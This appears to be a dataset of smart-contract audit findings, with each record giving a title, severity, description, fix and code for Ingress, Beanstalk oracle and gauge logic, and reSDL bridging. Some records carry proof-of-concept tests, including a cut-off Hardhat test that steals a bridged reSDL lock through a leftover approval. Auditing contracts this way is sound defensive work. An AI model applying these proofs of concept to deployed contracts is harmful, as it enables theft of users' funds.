registry.\");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n 
contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n -Use specific contract types instead of address where possibleчlowчFor clarity and to get more out of the Solidity type checker, it's generally preferred to use a specific contract type for variables rather than the generic `address`.\\n`AccountRules.ingressContractAddress` could instead be `AccountRules.ingressContract` and use the type IngressContract:\\n```\\naddress private ingressContractAddress;\\n```\\n\\n```\\nAccountIngress ingressContract = AccountIngress(ingressContractAddress);\\n```\\n\\n```\\nconstructor (address ingressAddress) public {\\n```\\n\\nThis same pattern is found in NodeRules:\\n```\\naddress private nodeIngressContractAddress;\\n```\\nчWhere possible, use a specific contract type rather than `address`.чч```\\naddress private ingressContractAddress;\\n```\\n -Ingress should use a setчlowчThe `AdminList`, `AccountRulesList`, and `NodeRulesList` contracts have been recently rewritten to use a set. `Ingress` has the semantics of a set but has not been written the same way.\\nThis leads to some inefficiencies. 
In particular, `Ingress.removeContract` is an O(n) operation:\\n```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\nчUse the same set implementation for Ingress: an array of `ContractDetails` and a mapping of names to indexes in that array.чч```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n -ContractDetails.owner is never readчlowчThe `ContractDetails` struct used by `Ingress` contracts has an `owner` field that is written to, but it is never read.\\n```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\nчResolution\\nThis is fixed in PegaSysEng/[email protected]d3f505e.\\nIf `owner` is not (yet) needed, the `ContractDetails` struct should be removed altogether and the type of `Ingress.registry` should change to `mapping(bytes32 => address)`чч```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n -[M-2] Failure in Maintaining Gauge PointsчmediumчThe defaultGaugePointFunction in the smart contract does not explicitly handle the scenario where the percentage of the Base Deposited Value (BDV) equals the optimal percentage (optimalPercentDepositedBdv), resulting in an unintended reduction of gauge points to 0 instead of maintaining their current value.\\nThe testnew_GaugePointAdjustment() test demonstrated this flaw by providing inputs where 
currentGaugePoints = 1189, optimalPercentDepositedBdv = 64, and percentOfDepositedBdv = 64, expecting newGaugePoints to equal currentGaugePoints. However, the outcome was newGaugePoints = 0, indicating an unexpected reduction to zero.\\n```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, \"New gauge points exceed the maximum allowed\");\\n assertEq(newGaugePoints, currentGaugePoints, \"Gauge points adjustment does not match expected outcome\");\\n}\\n```\\nчImplement Explicit Returns: Ensure the defaultGaugePointFunction has an explicit return for the case where gauge points should not be adjusted. This can be achieved by adding a final return statement that simply returns currentGaugePoints if neither condition for incrementing nor decrementing is met, as shown below:\\n```\\nelse {\\n return currentGaugePoints; \\n}\\n```\\nчThis behavior can lead to an undesired decrease in incentives for contract participants, potentially affecting participation and reward accumulation within the contract's ecosystem. 
Users may lose gauge points and, consequently, rewards due to a technical flaw rather than their actions.ч```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, \"New gauge points exceed the maximum allowed\");\\n assertEq(newGaugePoints, currentGaugePoints, \"Gauge points adjustment does not match expected outcome\");\\n}\\n```\\n -Silo is not compatible with Fee-on-transfer or rebasing tokensчmediumчAccording to the documentation there are certain conditions that need to be met for a token to be whitelisted:\\n```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n\\nThus if the community proposes any kind of Fee-on-Transfer or rebasing tokens like (PAXG or stETH) and the Beanstalk governance approves it, then the protocol needs to integrate them into the system. But as it is now the system is definitely not compatible with such tokens.\\n`deposit`, `depositWithBDV`, `addDepositToAccount`, `removeDepositFromAccount` and any other `silo` accounting related functions perform operations using inputed/recorded amounts. 
They don't query the existing balance of tokens before or after receiving/sending in order to properly account for tokens that shift balance when received (FoT) or shift balance over time (rebasing).чClearly state in the docs that weird tokens won't be implemented via Governance Vote or adjust the code to check the `token.balanceOf()` before and after doing any operation related to the `silo`.чLikelihood - low/medium - At the moment of writing Lido has over 31% of the ETH staked which makes `stETH` a very popular token. There's a strong chance that stakeholders would want to have `stETH` inside the silo.\n1. The token address;\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\n3. The number of Stalk and Seeds per BDV received upon Deposit.\n```\n -`removeWhitelistStatus` function Ignores updating `milestoneSeason` variableчmediumчThe issue in the `LibWhitelistedTokens:removeWhitelistStatus` function is that it removes the Whitelist status of a token without considering the impact on other related variables, such as the `milestoneSeason` variable.\n`milestoneSeason` is used in many functions for checking whether a token is whitelisted or not i.e.\n```\n require(s.ss[token].milestoneSeason == 0, \"Whitelist: Token already whitelisted\");\n```\n\nIf the milestoneSeason variable is not updated or cleared when removing the Whitelist status, it may lead to incorrect behavior in subsequent checks or operations that rely on this variable.чTo address this issue, ensure that related variables, such as `milestoneSeason`, are appropriately updated or cleared when removing the Whitelist status of a token. 
If the `milestoneSeason` variable is no longer relevant after removing the Whitelist status, it should be updated or cleared to maintain data integrity.ч`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable\\nRemoving the Whitelist status of a token without updating related variables can lead to inconsistencies in the data stored in the contract. The `milestoneSeason` variable, used for checking whitelist status in many functions, may still hold outdated or incorrect information after removing the status, potentially leading to unexpected behavior or vulnerabilities.ч```\\n require(s.ss[token].milestoneSeason == 0, \"Whitelist: Token already whitelisted\");\\n```\\n -No validation of total supply of unripe beans & Lp in `percentBeansRecapped` & `percentLPRecapped`чlowч`LibUnripe:percentBeansRecapped` & `LibUnripe:percentLPRecapped` functions calculate the percentage of Unripe Beans and Unripe LPs that have been recapitalized, respectively. These percentages are calculated based on the underlying balance of the Unripe Tokens and their total supply. 
There is no check if the `totalSupply` is zero which is used as division in the calculation.\\nSee the following code for both the functions:\\n```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\nчTo handle this scenario, appropriate checks should be added to ensure that the `totalSupply` of Unripe Beans or LP tokens is non-zero before performing the division operation.чIf the `totalSupply` in these two functions becomes zero, the calculation of the percentage of recapitalized Unripe Beans or LP tokens would result in a division by zero error. This is because of the denominator in the calculation. When the total supply is zero, dividing by zero is not defined in Solidity, and the contract would revert with an error.\\nThese functions are used widely across the different contracts at crucial places. 
So they will effect a lot of functionalities.ч```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n -Temperature and caseId are incorrectly adjusted when oracle failsчmediumчWhen user calls `gm` and the call for the chainlink oracle fails, it will return 0 for the `deltaB` value and this will cause a cascade effect, making the calculation of `caseId` = `3` and using the incorrect `caseId` to set up the new temperature on Weather.sol\\n```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n\\nEvery consumer of the temperature on the protocol will be affected like:\\n`LibDibbler.morningTemperature`\\n`LibDibbler.beansToPods`\\n`LibDibbler.remainingPods`\\n`Sun.setSoilAbovePeg`\\n`Sun.stepSun`\\n`FieldFacet.maxTemperature`\\n`FieldFacet.totalSoil`\\n`FieldFacet._totalSoilAndTemperature`\\n`FieldFacet.sowWithMin\\n`gm` function uses the incorrect deltaB(0) to calculate the `caseId` which is then used to set the 
temperature.\\n```\\n function gm(address account, LibTransfer.To mode) public payable returns (uint256) {\\n int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here\\n uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero\\n LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());\\n LibGauge.stepGauge();\\n stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero\\n }\\n```\\n\\nPrepare the environment to work with Foundry + Updated Mocks https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c\\nMake sure to have the mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`\\nCreate the `SeasonTemperature.t.sol` file under the folder `foundry` and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity =0.7.6;\\npragma abicoder v2;\\n\\nimport { Sun } from \"contracts/beanstalk/sun/SeasonFacet/Sun.sol\";\\nimport { MockSeasonFacet } from \"contracts/mocks/mockFacets/MockSeasonFacet.sol\";\\nimport { MockSiloFacet } from \"contracts/mocks/mockFacets/MockSiloFacet.sol\";\\nimport { MockFieldFacet } from \"contracts/mocks/mockFacets/MockFieldFacet.sol\";\\nimport { MockWhitelistFacet } from \"contracts/mocks/mockFacets/MockWhitelistFacet.sol\";\\nimport {LibWhitelist} from \"contracts/libraries/Silo/LibWhitelist.sol\";\\nimport { Utils } from \"./utils/Utils.sol\";\\nimport \"./utils/TestHelper.sol\";\\nimport \"contracts/libraries/LibSafeMath32.sol\";\\nimport \"contracts/C.sol\";\\n\\ncontract SeasonTemperatureTest is MockSeasonFacet, TestHelper {\\n using SafeMath for uint256;\\n using LibSafeMath32 for uint32;\\n\\n bool oracleFailed;\\n \\n function setUp() public {\\n console.log(\"diamondSetup\");\\n vm.createSelectFork('local');\\n oracleFailed = 
false;\\n setupDiamond();\\n dewhitelistCurvePool();\\n mintUnripeLPToUser1(); \\n mintUnripeBeanToUser1();\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n _setReservesForWell(1000000e6, 1000e18);\\n \\n // user / tokens\\n mintTokenForUsers();\\n setTokenApprovalForUsers();\\n \\n enableFertilizerAndMintActiveFertilizers();\\n\\n callSunriseForUser1();\\n }\\n\\n\\n //////////// Setup functions ////////////\\n\\n function setTokenApprovalForUsers() internal { \\n approveTokensForUser(deployer);\\n approveTokensForUser(user1);\\n approveTokensForUser(user2);\\n approveTokensForUser(user3);\\n approveTokensForUser(user4);\\n approveTokensForUser(user5);\\n }\\n\\n function mintTokenForUsers() internal { \\n mintWETHtoUser(deployer);\\n mintWETHtoUser(user1);\\n mintWETHtoUser(user2);\\n mintWETHtoUser(user3);\\n mintWETHtoUser(user4);\\n mintWETHtoUser(user5);\\n\\n // mint C.bean() to users\\n C.bean().mint(deployer, 10e6);\\n C.bean().mint(user1, 10e6);\\n C.bean().mint(user2, 10e6);\\n C.bean().mint(user3, 10e6);\\n C.bean().mint(user4, 10e6);\\n C.bean().mint(user5, 10e6);\\n }\\n\\n function approveTokensForUser(address user) prank(user) internal { \\n mockWETH.approve(address(diamond), type(uint256).max);\\n unripeLP.approve(address(diamond), type(uint256).max);\\n unripeBean.approve(address(diamond), type(uint256).max);\\n well.approve(address(diamond), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n }\\n\\n function dewhitelistCurvePool() public {\\n vm.prank(deployer);\\n whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);\\n }\\n\\n function mintWETHtoUser(address user) prank(user) internal {\\n mockWETH.mint(user, 1000e18);\\n }\\n\\n function mintUnripeLPToUser1() internal { \\n unripeLP.mint(user1, 1000e6);\\n }\\n\\n function mintUnripeBeanToUser1() internal { \\n unripeBean.mint(user1, 1000e6);\\n }\\n\\n function enableFertilizerAndMintActiveFertilizers() 
internal { \\n // second parameter is the unfertilizedIndex\\n fertilizer.setFertilizerE(true, 10000e6);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(7500, 1e11, 99);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(6200, 1e11, 99);\\n\\n addUnripeTokensToFacet();\\n }\\n\\n function addUnripeTokensToFacet() prank(deployer) internal { \\n unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));\\n unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));\\n }\\n\\n function callSunriseForUser1() prank(user1) internal {\\n _ensurePreConditions();\\n _advanceInTime(2 hours);\\n season.sunrise();\\n }\\n\\n function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal { \\n if (makeOracleFail) { \\n _addEthUsdPriceChainlink(0);\\n oracleFailed = true;\\n } else { \\n oracleFailed = false;\\n _addEthUsdPriceChainlink(chainlinkPrice);\\n _setEthUsdtPrice(ethUsdtPrice);\\n _setEthUsdcPrice(ethUsdcPrice);\\n }\\n }\\n\\n ////////////////////////////////////////// TESTS //////////////////////////////////////////\\n\\n function testWrongCalcId_whenOracleFails() public { \\n _prepareForAbovePeg();\\n _advanceInTime(1 hours);\\n uint256 _snapId = vm.snapshot();\\n \\n // When sunrise succeeds\\n vm.prank(user4);\\n season.sunrise();\\n\\n // Then print results\\n _printProtocolState();\\n assertEq(season.getT(), 5, \"when succeeds t should be 5\");\\n \\n // Then revert it to prepare for the season that will fail\\n vm.revertTo(_snapId);\\n\\n // Prepare for the season that will fail\\n setOraclePrices(true, 0, 0, 0);\\n\\n // When sunrise fails\\n vm.prank(user4);\\n season.sunrise();\\n\\n console.log(\"Oracle failed, see results\");\\n _printProtocolState();\\n assertEq(season.getT(), 1, \"when succeeds t should be 1\");\\n\\n }\\n\\n function _printProtocolState() internal { \\n console.log(\"-------------- Results --------------\");\\n console.log(\"\");\\n 
console.log(\"thisSowTime: \", season.thisSowTime());\\n console.log(\"lastSowTime: \", season.lastSowTime());\\n console.log(\"getUsdTokenPrice: \", season.getUsdTokenPrice());\\n console.log(\"getReserve0: \", season.getReserve0());\\n console.log(\"getReserve1: \", season.getReserve1());\\n console.log(\"getAbovePeg: \", season.getAbovePeg());\\n console.log(\"getSoil: \", season.getSoil());\\n console.log(\"lastDSoil: \", season.lastDSoil());\\n console.log(\"s.w.t: \", season.getT());\\n console.log(\"remaining pods: \", field.remainingPods());\\n } \\n\\n function _prepareForAbovePeg() internal { \\n season.mockSetSopWell(address(well));\\n season.captureWellE(address(well)); \\n season.setYieldE(5); // s.w.t\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n\\n season.setLastSowTimeE(1);\\n season.setNextSowTimeE(10);\\n season.calcCaseIdE(1e18, 1);\\n season.setAbovePegE(true);\\n }\\n\\n ////////////////////////////////////////// HELPERS //////////////////////////////////////////\\n\\n function _ensurePreConditions() internal { \\n assertTrue(season.thisSowTime() == type(uint32).max, \"thisSowTime should be max\");\\n assertTrue(season.lastSowTime() == type(uint32).max, \"thisLastSowTime should be max\");\\n assertEq(season.getIsFarm(), 1, \"isFarm should be 1\");\\n assertEq(season.getUsdTokenPrice(), 1, \"usdTokenPrice should be 1\");\\n assertEq(season.getReserve0(), 1, \"reserve0 should be 1\");\\n assertEq(season.getReserve1(), 1, \"reserve1 should be 1\");\\n assertFalse(season.getAbovePeg(), \"pre - abovePeg should be false\");\\n assertEq(season.getSoil(), 0, \"soil should be == 0\");\\n }\\n}\\n```\\n\\nOutput:\\n```\\n handleRain caseId: 0\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 462832752243\\n lastDSoil: 0\\n s.w.t: 5\\n remaining pods: 467461079765\\n\\nhandleRain caseId: 3\\n Oracle failed, 
see results\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 0\\n lastDSoil: 0\\n s.w.t: 1\\n remaining pods: 0\\n\\nSuite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)\\n```\\n\\nps: a console.log was added to the `handleRain` function to print the caseId.\\nResult: In a normal scenario the temperature would have remained at the value `5` but in this case was set to `1` and remaining pods/soil are also set to zero when in fact they should not.чIt is noticed that the developers have the intention of never reverting the sunrise function to decrease the risk of depeg and breaking the incentive for users calling it. But at the same time, those state variables shouldn't be updated as if the system is working correctly because they will impact the next season as stated in this finding.\\nIt is tricky to propose a simple fix to the problem without impacting the system as a whole. Here are a few ideas that could be used:\\n(Recommended) An effective solution could be store the latest response from chainlink and in case it fails and the timeout(a limit that you can be added to accept a previous response from the oracle) is not reached yet, protocol could use the previous response. Liquity Protocol uses this approach, an example here: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution will be effective for the protocol because the oracle is also called in different places like when minting fertilizers(getMintFertilizerOut), getting the well price(getRatiosAndBeanIndex), and `getConstantProductWell`. 
As the oracle is used along the protocol in many places, the `latest successful price` would be often up-to-date and within the limit time defined to use the previous price when the chainlink oracle fails.\\nAdditionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.чThe interest rate will be wrongly decreased to 1, compromising the protocol peg mechanism when it needs to be maintained with a high interest rate/ temperature.\\nSow will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods\\nRemaining pods function will return zero and users will have an inaccurate number representing their actual pods.ч```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n -`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hoursчmediumчThe `LibChainlinkOracle` library utilizes a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). 
This duration is four times longer than the `Chainlink` heartbeat that is `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.\nThe `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments: `timestamp`, `answer` and `currentTimestamp` and checks if the returned `answer` from `Chainlink Oracle` or the `timestamp` is invalid:\n```\n function checkForInvalidTimestampOrAnswer(\n uint256 timestamp,\n int256 answer,\n uint256 currentTimestamp\n ) private pure returns (bool) {\n // Check for an invalid timeStamp that is 0, or in the future\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\n // Check if Chainlink's price feed has timed out\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\n // Check for non-positive price\n if (answer <= 0) return true;\n }\n```\n\nThe function also checks if the difference between the `currentTimestamp` and the `timestamp` is greater than `CHAINLINK_TIMEOUT`. The `CHAINLINK_TIMEOUT` is defined to be 4 hours:\n```\n uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4\n```\nчConsider reducing the `CHAINLINK_TIMEOUT` to align more closely with the `Chainlink` heartbeat on Ethereum, enhancing the relevance of the price data.чThe `Chainlink` heartbeat indicates the expected frequency of updates from the oracle. The `Chainlink` heartbeat on Ethereum for `Eth/Usd` is `3600` seconds (1 hour).\nhttps://docs.chain.link/data-feeds/price-feeds/addresses?network=ethereum&page=1&search=0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\nBut the defined `CHAINLINK_TIMEOUT` in the `LibChainlinkOracle` is `14400` seconds (4 hours).\nA `CHAINLINK_TIMEOUT` that is significantly longer than the heartbeat can lead to scenarios where the `LibChainlinkOracle` library accepts data that may no longer reflect current market conditions. 
Also, in volatile markets, a 4-hour window leads to accepting outdated prices, increasing the risk of price slippage.ч```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n -[M] DOS in LibChainlinkOracle when not considering phaseIdчmediumч`LibChainlinkOracle` is not fully compatible with Chainlink's data model due to the lack of support for `phaseId and aggregatorRoundId`. Chainlink's `roundID` is a composite number combining a `phaseID and an aggregatorRoundID`.\\nThe `phaseID` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in the `roundID` values due to the bit-shifting operation described in the documentation.\\nref here: https://docs.chain.link/data-feeds/historical-data#solidity\\nThe Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundID` as sequential, overlooking Chainlink's unique bundling of `phaseId` and `aggregatorRoundId`. With the advancement of `phaseID`, there's an exponential increase in `roundID` by 2^64, leading to a temporal suspension until a new interval commences. This will instigate a denial-of-service scenario. 
The `getEthUsdTwap and getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which effects for example any calls reliant on Oracle data.\\n```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n\\n```\\n function latestRoundData()\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n Phase memory current = currentPhase; // cache storage reads\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = current.aggregator.latestRoundData();\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);\\n }\\n```\\n\\nhttps://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code\\nThe code segment extracted from the ETH/USD Chainlink aggregator above highlights the composite structure of `roundId`, integrating both `phaseId` and aggregatorRoundId. As highlighted, an increment in `phaseId` leads to a substantial leap in `roundId by 2^64`, thereby bypassing a number of \"rounds.\" Consequently, any attempt to query currentRound - 1 post-upgrade encounters a non-existent round, triggering a revert. 
This condition could persist up to 24 hours based on configuration, impacting the timely execution of getEthUsdTwap and getEthUsdPrice.\nThese functions, once operational again, might utilize altered TWAP values for computations, diverging from expected outcomes.чCheck return values of roundId. If the `roundID` is a nonzero value and is reverting then the oracle needs to try again with a lower `phaseId`.чIf a `phaseID` increment occurs, it results in a jump in `roundID` values, creating a gap in the sequence. When there are attempts to access round data for `roundIDs` within this gap, it will encounter inaccurate rounds, potentially causing the function to fail or return incorrect data, considering when the `phaseID` is incremented the `roundID` increases by `2 ** 64`. This discrepancy can lead to a denial-of-service in any calls to the oracle.ч```\nfunction getRoundData(uint80 _roundId)\n public\n view\n virtual\n override\n returns (\n uint80 roundId,\n int256 answer,\n uint256 startedAt,\n uint256 updatedAt,\n uint80 answeredInRound\n )\n {\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\n\n (\n uint80 roundId,\n int256 answer,\n uint256 startedAt,\n uint256 updatedAt,\n uint80 ansIn\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\n\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\n }\n```\n -A user can steal an already transferred and bridged reSDL lock because of approvalчhighчThe reSDL token approval is not deleted when the lock is bridged to another chain\nWhen a reSDL token is bridged to another chain, the `handleOutgoingRESDL()` function is called to make the state changes into the `sdlPool` contract. 
The function executes the following:\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n\\nAs we can see, it deletes the lock.amount of the lockId, removes the ownership of the lock and decrements the lock balance of the account that is bridging the lock. The approval that the user had before bridging the reSDL lock will remain there and he can get benefited from it by stealing the NFT. Consider the following situation: A user knows that there is a victim that is willing to pay the underlying value for a reSDL lock ownership transfer. What the malicious user can do is set approval to move his lockId in all supported chains to an alt address that he owns. Then, he trades the underlying value for the reSDL ownership and the lock is transfered to the victim/buyer. 
If the buyer keeps the lock in this chain nothing happens, but if he bridges any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.\\nIt is written inside `resdl-token-bridge.test.ts` because it uses its setup\\n```\\n it('PoC steal reSDL', async () => {\\n let lockId = 2\\n\\n let thief = accounts[0]\\n let victim = accounts[1]\\n\\n let thiefAccount2 = accounts[2]\\n\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n // Thief approves an alt account that he controls to move his lock in the original chain\\n await sdlPool.approve(thiefAccount2, lockId)\\n\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief bridges the lock to an other chain but the approval is not deleted\\n await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })\\n let lastRequestMsg = await onRamp.getLastRequestMessage()\\n assert.deepEqual(\\n ethers.utils.defaultAbiCoder\\n .decode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n lastRequestMsg[1]\\n )\\n .map((d, i) => {\\n if (i == 0) return d\\n if (i > 1 && i < 4) return fromEther(d)\\n return d.toNumber()\\n }),\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n )\\n assert.deepEqual(\\n lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),\\n [[sdlToken.address, 1000]]\\n )\\n assert.equal(lastRequestMsg[3], wrappedNative.address)\\n assert.equal(lastRequestMsg[4], '0x11')\\n await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')\\n\\n // The user 